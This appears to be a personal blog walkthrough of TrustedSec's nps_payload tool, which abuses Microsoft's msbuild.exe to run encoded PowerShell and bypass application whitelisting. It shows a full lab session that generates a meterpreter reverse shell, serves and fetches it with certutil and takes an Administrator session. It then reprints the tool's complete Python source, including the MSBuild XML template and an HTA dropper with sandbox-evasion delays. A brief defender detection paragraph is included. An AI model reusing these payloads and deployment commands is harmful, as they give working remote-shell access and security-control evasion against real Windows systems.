MSbuild nps_payload

Microsoft has released a lot of binaries within the .NET framework that have the ability to compile and execute code. Originally MSBuild was introduced in order to enable developers to build products in environments where Visual Studio is not installed. Specifically this binary can compile XML C# project files since it has a method called Tasks that can execute a task which is written in a managed code. However since this method can take code and the MSBuild is a trusted Microsoft binary that can execute this code it can be abused by an attacker in order to bypass AppLocker and other application whitelisting solutions like Device Guard.

Casey Smith (@subtee)  has released several repositories that can be used as a proof of concept to execute code and bypass AppLocker restrictions.

Two TrustedSec team members, Larry Spohn (@spoonman1091) and Ben Mauch (@ben0xa), decided to take Ben’s Not PowerShell (nps) and Dave Kennedy’s unicorn and mash some of the functionality together with Casey’s sample and they came up with a new tool called nps_payload.

This tool provides a way to generate a PowerShell payload which will be inserted into the msbuild_nps.xml file and will use nps to execute the payload when msbuild.exe runs the file. Similar to Dave Kennedy’s unicorn, nps_payload also provides a Metasploit console resource (msbuild_nps.rc) file.

There are two ways you can deploy the msbuild_nps.xml file. The first is to copy the msbuild_nps.xml file to the remote host and then use the following command to execute.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\<path_to_msbuild_nps.xml>

This second way is to host the msbuild_nps.xml file on a SMB share and use UNC path with the msbuild.exe command to point to the xml file.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attacker_ip>\<share>\msbuild_nps.xml

This will run the encoded PowerShell payload using nps and will return a shell to the attacker. Once the attacker migrates to a new process, msbuild.exe will exit. It is important to note that nps executes the PowerShell code without invoking powershell.exe and will not show up in Event ID 4688 (New Process Created).

For Defenders, you can detect this attack by monitoring Event ID 4688 events for any invocation of msbuild.exe and then to check the command line arguments for any reference to UNC or local files. You can also enable PowerShell logging and monitor Event ID 4104 Events and look for any PowerShell code which is encoded.

You can download nps_payload on TrustedSec’s GitHub at https://www.github.com/trustedsec/nps_payload

see it all in action

root@kali:/opt/nps_payload# ./nps_payload.py

( (
) ( )\ ) )\ )
( ` ) ( ` ) ( /( )\ )((_)( ( /( (()/(
)\ ) /(/( )\ /(/( )(_)|()/( _ )\ )(_)) ((_)
_(_/(((_)_\((_) ((_)_\((_)_ )(_)) |((_)((_)_ _| |
| ' \)) '_ \|_-< | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
|_| |_____|_| |__/

v1.03


(1) Generate msbuild/nps/msf payload
(2) Generate msbuild/nps/msf HTA payload
(99) Quit

Select a task: 1

Payload Selection:

(1) windows/meterpreter/reverse_tcp
(2) windows/meterpreter/reverse_http
(3) windows/meterpreter/reverse_https
(4) Custom PS1 Payload

Select payload: 1
Enter Your Local IP Address (None): 192.168.178.12
Enter the listener port (443): 443
[*] Generating PSH Payload...
[*] Generating MSF Resource Script...
[+] Metasploit resource script written to msbuild_nps.rc
[+] Payload written to msbuild_nps.xml

1. Run "msfconsole -r msbuild_nps.rc" to start listener.
2. Choose a Deployment Option (a or b): - See README.md for more information.
a. Local File Deployment:
- %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
b. Remote File Deployment:
- wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
3. Hack the Planet!!

serve the payload

root@kali:/opt/nps_payload# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.178.24 - - [07/May/2019 03:17:35] "GET / HTTP/1.1" 200 -
192.168.178.24 - - [07/May/2019 03:17:40] "GET /msbuild_nps.xml HTTP/1.1" 200 -

transfer payload msbuild-nps.xml to target and run it

c:\Windows\Microsoft.NET\Framework\v4.0.30319>certutil.exe -urlcache -split -f h
ttp://192.168.178.12/msbuild_nps.xml msbuild_nps.xml
****  Online  ****
  0000  ...
  152a
CertUtil: -URLCache command completed successfully.

c:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild msbuild_nps.xml
Microsoft (R) Build Engine Version 4.0.30319.1
[Microsoft .NET Framework, Version 4.0.30319.233]
Copyright (C) Microsoft Corporation 2007. All rights reserved.

Build started 5/7/2019 9:35:20 AM.
root@kali:/opt/nps_payload# msfconsole -r msbuild_nps.rc
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***

, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||


=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]

[*] Processing msbuild_nps.rc for ERB directives.
resource (msbuild_nps.rc)> use multi/handler
resource (msbuild_nps.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (msbuild_nps.rc)> set LHOST 192.168.178.12
LHOST => 192.168.178.12
resource (msbuild_nps.rc)> set LPORT 443
LPORT => 443
resource (msbuild_nps.rc)> set ExitOnSession false
ExitOnSession => false
resource (msbuild_nps.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (msbuild_nps.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.178.12:443 
msf5 exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (179808 bytes) to 192.168.178.24
[*] Meterpreter session 1 opened (192.168.178.12:443 -> 192.168.178.24:49165) at 2019-05-07 03:18:42 -0400

msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows HERCULES\Administrator @ HERCULES 192.168.178.12:443 -> 192.168.178.24:49165 (192.168.178.24)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : HERCULES
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest> dir *.bin

Directory: C:\pentest

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2019 4:16 PM 5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest> dir *.xml

Directory: C:\pentest

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2019 4:16 PM 5462 msbuild_nps.xml

the python code

#!/usr/bin/env python

# Written by Larry Spohn (@Spoonman1091)
# Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
# TrustedSec, LLC
# https://www.trustedsec.com

from __future__ import print_function
import os
import sys
import netifaces as nic
import pexpect
import base64

class bcolors:
  BLUE = '\033[94m'
  GREEN = '\033[92m'
  WARNING = '\033[93m'
  WHITE = '\033[97m'
  ERROR = '\033[91m'
  ENDC = '\033[0m'
  BOLD = '\033[1m'
  UNDERLINE = '\033[4m'

listener_ip = "127.0.0.1"

# Configure for auto detection of local IP Address
local_interface = "ens33"

try:
    raw_input          # Python 2
except NameError:
    raw_input = input  # Python 3

# Enumerate the local IP assigned to "iface"
def get_local_ip(iface):
  try:
    nic.ifaddresses(iface)
    local_ip = nic.ifaddresses(iface)[2][0]['addr']
    return local_ip
  except:
    pass

def generate_msfvenom_payload(msf_payload):
  global listener_ip

  if (listener_ip == "127.0.0.1"):
    local_ip = get_local_ip(local_interface)
    listener_ip = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip

  # Get listern port from user
  msf_port = raw_input("Enter the listener port (443): ") or 443

  # Generate PSH payload
  print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
  output = pexpect.run("msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f psh -o msf_payload.ps1" % (msf_payload,listener_ip,msf_port))

  # Generate resource script
  print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
  msf_resource_file = open("msbuild_nps.rc", "a")
  payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
  msf_resource_file.write(payload_listener)
  msf_resource_file.close()

def encode_pshpayload(payload_file):
  global psh_payload

  psh_file = open(payload_file, "r")
  psh_payload = psh_file.read() + "for (;;){\n  Start-sleep 60\n}"
  psh_payload = base64.b64encode(psh_payload.encode('utf-8'))
  psh_file.close()
  return psh_payload

def generate_msbuild_nps_msf_payload():
  global psh_payload
  global listener_ip

  # Delete old resource script
  if os.path.exists("msbuild_nps.rc"):
    os.remove("msbuild_nps.rc")

  # Initilize new resource script
  msf_resource_file = open("msbuild_nps.rc", "a")
  msf_resource_file.write("use multi/handler")
  msf_resource_file.close()

  # Display options to the user
  print("\nPayload Selection:")
  print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  print("\t(2)\twindows/meterpreter/reverse_http")
  print("\t(3)\twindows/meterpreter/reverse_https")
  print("\t(4)\tCustom PS1 Payload")

  options = {1: "windows/meterpreter/reverse_tcp",
             2: "windows/meterpreter/reverse_http",
             3: "windows/meterpreter/reverse_https",
             4: "custom_ps1_payload"
  }

  # Generate payload
  try:
    msf_payload = input("\nSelect payload: ")
    if (options.get(msf_payload) == "custom_ps1_payload"):
      custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
      encode_pshpayload(custom_ps1)
    else:
      generate_msfvenom_payload(options.get(msf_payload))
      encode_pshpayload("msf_payload.ps1")

  except KeyError:
    pass


  # Create msbuild_nps.xml
  msbuild_nps_file = open("msbuild_nps.xml", "w")
  msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
  <!-- License: BSD 3-Clause -->
  <Target Name="npscsharp">
   <nps />
  </Target>
  <UsingTask
    TaskName="nps"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
  <Task>
    <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[

          using System;
      using System.Collections.ObjectModel;
      using System.Management.Automation;
      using System.Management.Automation.Runspaces;
      using Microsoft.Build.Framework;
      using Microsoft.Build.Utilities;

      public class nps : Task, ITask
        {
            public override bool Execute()
            {
              string cmd = "%s";

                PowerShell ps = PowerShell.Create();
                ps.AddScript(Base64Decode(cmd));

                Collection<PSObject> output = null;
                try
                {
                    output = ps.Invoke();
                }
                catch(Exception e)
                {
                    Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
                }
                if (output != null)
                {
                    foreach (PSObject rtnItem in output)
                    {
                        Console.WriteLine(rtnItem.ToString());
                    }
                }
                return true;
            }

            public static string Base64Encode(string text) {
           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
        }

        public static string Base64Decode(string encodedtext) {
            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
        }
        }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>""" % psh_payload)

  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")  
  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
  print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
  print("  a. Local File Deployment:\n" + bcolors.WHITE + "    - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
  print("  b. Remote File Deployment:\n" + bcolors.WHITE + "    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
  print("3. Hack the Planet!!")

  sys.exit(0)

def generate_msbuild_nps_msf_hta_payload():
  global psh_payload
  global listener_ip

  psh_payload = ""
  psh_payloads = ""
  payload_count = 1


  # Delete old resource script
  if os.path.exists("msbuild_nps.rc"):
    os.remove("msbuild_nps.rc")

  # Initilize new resource script
  msf_resource_file = open("msbuild_nps.rc", "a")
  msf_resource_file.write("use multi/handler")
  msf_resource_file.close()

  while True:
    # Display options to the user
    print("\nPayload Selection:")
    print("\n\t(1)\twindows/meterpreter/reverse_tcp")
    print("\t(2)\twindows/meterpreter/reverse_http")
    print("\t(3)\twindows/meterpreter/reverse_https")
    print("\t(4)\tCustom PS1 Payload")
    print("\t(99)\tFinished")

    options = {1: "windows/meterpreter/reverse_tcp",
               2: "windows/meterpreter/reverse_http",
               3: "windows/meterpreter/reverse_https",
               4: "custom_ps1_payload",
               99: "finished"
    }

    # Generate payloads
    try:
      msf_payload = input("\nSelect multiple payloads. Enter 99 when finished: ")
      if (options.get(msf_payload) == "finished"):
        break
      elif (options.get(msf_payload) == "custom_ps1_payload"):
        custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
        encode_pshpayload(custom_ps1)
      else:
        generate_msfvenom_payload(options.get(msf_payload))
        encode_pshpayload("msf_payload.ps1")
        os.remove("msf_payload.ps1")

      # Generate payload vbs array string
      if (payload_count == 1):
        psh_payloads = "\"" + psh_payload + "\""
      else:
        psh_payloads += ", _\n\t\"" + psh_payload + "\""
      payload_count += 1

    except KeyError:
      pass

  # Create msbuild_nps.xml
  msbuild_nps_file = open("msbuild_nps.hta", "w")
  msbuild_nps_file.write("""<script language=vbscript>
  On Error Resume Next

  Set objFSO = CreateObject("Scripting.FileSystemObject")
  Set objShell = CreateObject("WScript.Shell")
  objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
  objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
  Set objWMIService = GetObject("winmgmts:\\\\.\\root\CIMV2")
  arrUnicorns = Array(%s)

  ' Get logical processor count
  Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
  For Each objComputerSystem In colComputerSystem
    objProcessorCount = objComputerSystem.NumberofLogicalProcessors
  Next

  ' Only run if system has more than 1 processor
  ' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
  If objProcessorCount > 1 Then
    ' Sleep 60 seconds
    ' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
    objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1

    For Each objUnicorn in arrUnicorns
      x = x + 1

      ' Create MSBuild XML File
      CreateMSBuildXML objUnicorn, x

      ' Execute resource(x).xml using msbuild.exe and nps
      objShell.Run objWindir & "\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
    Next

    ' Cleanup
    For y = 1 To x
      Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
        objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
        objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
      Loop
    Next
  End If

  window.close()

  ' Creates XML configuration files in the %%TEMP%% directory
  Function CreateMSBuildXML(objUnicorn, x)
    msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
    "  <!-- This inline task executes c# code. -->" & vbCrLf &_
    "  <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->" & vbCrLf &_
    "  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
    "  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
    "  <!-- License: BSD 3-Clause -->" & vbCrLf &_
    "  <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
    "   <nps />" & vbCrLf &_
    "  </Target>" & vbCrLf &_
    "  <UsingTask" & vbCrLf &_
    "    TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
    "    TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
    "    AssemblyFile=" & CHR(34) & "C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
    "  <Task>" & vbCrLf &_
    "    <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
    "      <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
    "        <![CDATA[" & vbCrLf &_
    "" & vbCrLf &_
    "          using System;" & vbCrLf &_
    "      using System.Collections.ObjectModel;" & vbCrLf &_
    "      using System.Management.Automation;" & vbCrLf &_
    "      using System.Management.Automation.Runspaces;" & vbCrLf &_
    "      using Microsoft.Build.Framework;" & vbCrLf &_
    "      using Microsoft.Build.Utilities;" & vbCrLf &_
    "" & vbCrLf &_
    "      public class nps : Task, ITask" & vbCrLf &_
    "        {" & vbCrLf &_
    "            public override bool Execute()" & vbCrLf &_
    "            {" & vbCrLf &_
    "              string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
    "              " & vbCrLf &_
    "                PowerShell ps = PowerShell.Create();" & vbCrLf &_
    "                ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
    "" & vbCrLf &_
    "                Collection<PSObject> output = null;" & vbCrLf &_
    "                try" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    output = ps.Invoke();" & vbCrLf &_
    "                }" & vbCrLf &_
    "                catch(Exception e)" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
    "                }" & vbCrLf &_
    "                if (output != null)" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    foreach (PSObject rtnItem in output)" & vbCrLf &_
    "                    {" & vbCrLf &_
    "                        Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
    "                    }" & vbCrLf &_
    "                }" & vbCrLf &_
    "                return true;" & vbCrLf &_
    "            }" & vbCrLf &_
    "" & vbCrLf &_
    "            public static string Base64Encode(string text) {" & vbCrLf &_
    "           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
    "        }" & vbCrLf &_
    "" & vbCrLf &_
    "        public static string Base64Decode(string encodedtext) {" & vbCrLf &_
    "            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
    "        }" & vbCrLf &_
    "        }" & vbCrLf &_
    "        ]]>" & vbCrLf &_
    "      </Code>" & vbCrLf &_
    "    </Task>" & vbCrLf &_
    "  </UsingTask>" & vbCrLf &_
    "</Project>"
    Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
    objFile.WriteLine(msbuildXML)
    objFile.Close
  End Function
</script>""" % psh_payloads)

  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")  
  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
  print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  print("2. Deploy hta file to web server and navigate from the victim machine.")
  print("3. Hack the Planet!!")

  sys.exit()

# Exit Program
def quit():
  sys.exit(0)


# Main guts
def main():
  print("""
                                     (            (
                              ) (    )\        )  )\ )
  (    `  )  (       `  )  ( /( )\ )((_)(   ( /( (()/(
  )\ ) /(/(  )\      /(/(  )(_)|()/( _  )\  )(_)) ((_)
 _(_/(((_)_\((_)    ((_)_\((_)_ )(_)) |((_)((_)_  _| |
| ' \)) '_ \|_-<    | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
      |_|     |_____|_|         |__/

                       v1.03
""")

  while(1):
    # Display options to the user
    print("\n\t(1)\tGenerate msbuild/nps/msf payload")
    print("\t(2)\tGenerate msbuild/nps/msf HTA payload")
    print("\t(99)\tQuit")

    options = {1: generate_msbuild_nps_msf_payload,
               2: generate_msbuild_nps_msf_hta_payload,
               99: quit,
    }
    try:
      task = input("\nSelect a task: ")
      options[task]()
    except KeyError:
      pass


# Standard boilerplate to call the main() function
if __name__ == '__main__':
  main()

references used :

  • https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
  • https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/

Author: Jacco Straathof